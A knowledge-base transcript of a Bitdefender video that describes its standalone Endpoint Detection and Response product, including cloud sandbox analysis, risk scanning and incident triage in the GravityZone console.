Search Knowledge Base by Keyword
Bitdefender Endpoint Detection and Response – Part 2
This is a transcript of the Bitdefender’s video below.
Bitdefender Endpoint Detection and Response is an effective, easy-to-use solution that strengthens your organizational security operations. Being a cloud-delivered and low-maintenance solution, standalone EDR is easy to deploy and integrates with your existing security architecture. The solution is fully compatible with your existing antivirus solution and caters to organizations whose existing security solution does not provide an advanced threat, visibility, and response. It helps uncover suspicious activity and provides tools to enable you to fight off cyber attacks.
EDR’s Threat visualization provides focus investigation, understanding of complex detections, and identifying the root cause of attacks. The easy-to-follow built-in response workflows enable security teams to respond efficiently, limit lateral spread, and stop ongoing attacks.
Bitdefender Standalone EDR package also provides risk management, which continuously analyzes organizations to identify risks and provides clear guidance to assist in user, network, and OS risk mitigation.
Bitdefender EDR offers a combination of detective, investigative, and compensative security controls that allow our customers to see beyond the typical alerts from our preventive framework. It utilizes the latest and current technologies to provide higher visibility and collect and correlate threat information while employing analytics and automation to help detect suspicious events. Bitdefender Sandbox Analyzer provides pre-execution detection of advanced attacks by automatically sending files that require further analysis to the cloud sandbox and taking remediation action based on the verdict. Thus, incident response teams can perform a fast alert triage and incident investigation using an attack timeline and sandbox output, enabling a faster response to stop ongoing attacks.
Need for EDR
Now, let’s dig deeper to see when an EDR solution would come into play while using it with the preventive technologies. Let’s assume that a threat adversary was able to send malware and infect the victim’s endpoint using several initial access techniques such as drive-by compromise, remote desktop protocol compromise, targeted spear phishing, and exploiting weaknesses on public-facing web servers.
The preventive technologies cover traditional anti-malware scanning to contain the malware strains. Endpoint detection and response covers advanced capabilities, like investigating security incidents to detect suspicious system events like registry key changes, remote file downloads, and hashed modifications, privilege escalations, and lateral movements.
EDR employs Advanced Threat Analytics to detect and perform investigations to provide visibility on tactics, techniques, and procedures of modern threat adversaries. Any detected suspicious file is sent to the Bitdefender Cloud Sandbox for further analysis. The Cloud Sandbox solution performs static and dynamic analysis of the files to correlate events and detect malicious patterns. Based on the severity of the infection, a score value is assigned, and appropriate actions are triggered.
The standalone EDR solution provides a granular, in-depth analysis report to alert the security teams. It reduces the time and effort spent on key security operation functions. Incident responders can either kill the ongoing suspicious process or take other appropriate response actions. Bitdefender standalone EDR solution provides enhanced visibility and data contextualization to be considered complementary to a SIEM tool. Our EDR technology is the happy medium between endpoint protection and SIEM, representing a perfect fit for most of our SMB to mid-market customers.
Now, let’s take a look at the standalone EDR management console on Gravityzone. We begin with the package configuration, which is preconfigured with zero trust execution protection, host-based network exploit protection, and our endpoint detection and response sensor for advanced threat detection and response.
Moving on to policy configuration. Standalone EDR technology has modified anti-malware options with Sandbox analyzer. This anti-malware technology provides Cloud-Based Threat Detection, which uses advanced machine learning algorithms. Along with that, it provides both execution protection and Fileless Attack Protection. These technologies are configured to report-only mode and assist the existing endpoint protection by providing threat visibility and appropriate response options.
The Sandbox Analyzer performs analysis by monitoring the suspicious activities; the content prefiltering scans the files, command line arguments, and URLs for suspicious behavior. The module automatically determines the objects that need further analysis and submits them to Sandbox analyzer depending on the configured protection level. Along with anti-malware, the standalone EDR provides host-based network protection, which reports to security teams when attack techniques like initial access credential access lateral movement are detected on the endpoint.
Additionally, the technology enables recurring risk scanning on targeted endpoints. It detects security misconfigurations and provides clear guidance on risk mitigation.
Now, let’s take a look at how a reported suspicious security event looks like on GravityZone. As you can see, in the image below, a score value is associated with the detection. This indicates the severity of the infection and the confidence that the technology has on the detected suspicious endpoint activity.
The security event is represented in a graphical format and the suspected root causes highlighted. On the right, the technology provides information on the detected application and the suspicious behavior carried out on the endpoint.
The security analyst investigating the event can add the application or file to the cloud sandbox or use open-source intelligence tools like VirusTotal or Google. As remediation, the analyst can either kill the process and stop the ongoing attack or consider it a false positive and add it as an exception.
Additionally, as a preventive measure, certain suspicious processes or files can be added to a block list to prevent them from execution. It eases the operational burden by recommending steps to mitigate the incident and prevent it from recurring in the future. Using Advanced Machine Learning Algorithms the EDR sensor was able to intercept and determine the suspicious behavior of the command line argument. It recorded all system events in a timestamp format to support focused investigation.
Thus, when the customer’s existing security solution does not provide the required advanced attack visibility, our standalone endpoint detection and response can quickly and effectively optimize and strengthen security functions.